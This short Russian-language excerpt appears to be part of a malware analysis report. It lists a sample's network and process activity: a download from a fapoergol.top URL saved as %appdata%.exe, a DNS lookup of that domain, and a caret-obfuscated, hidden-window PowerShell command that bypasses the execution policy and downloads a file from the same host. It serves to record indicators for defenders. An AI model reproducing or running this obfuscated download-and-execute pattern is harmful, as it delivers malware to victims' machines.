Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^eR^S^HEL^L.ex^e^ -exe^c^u^T^IoN^P^Ol^Ic^y ByPA^SS -no^pR^of^il^E ^-W^i^NDOwStY^lE ^hI^ddE^n^ (N^e^w-^Obj^eCT ^SysTE^M.^NE^t^.^w^e^BcLiE^NT).DoW^NLoAD^fI^lE('http://www.fapoer...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "POw^eR^S^HEL^L.ex^e^ -exe^c^u^T^IoN^P^Ol^Ic^y ByPA^SS -no^pR^of^il^E ^-W^i^NDOwStY^lE ^hI^ddE^n^ (N^e^w-^Obj^eCT ^SysTE^M.^NE^t^.^w^e^BcLiE^NT).DoW^NLoAD^fI^lE('http://www.fapoer...' (со скрытым окном)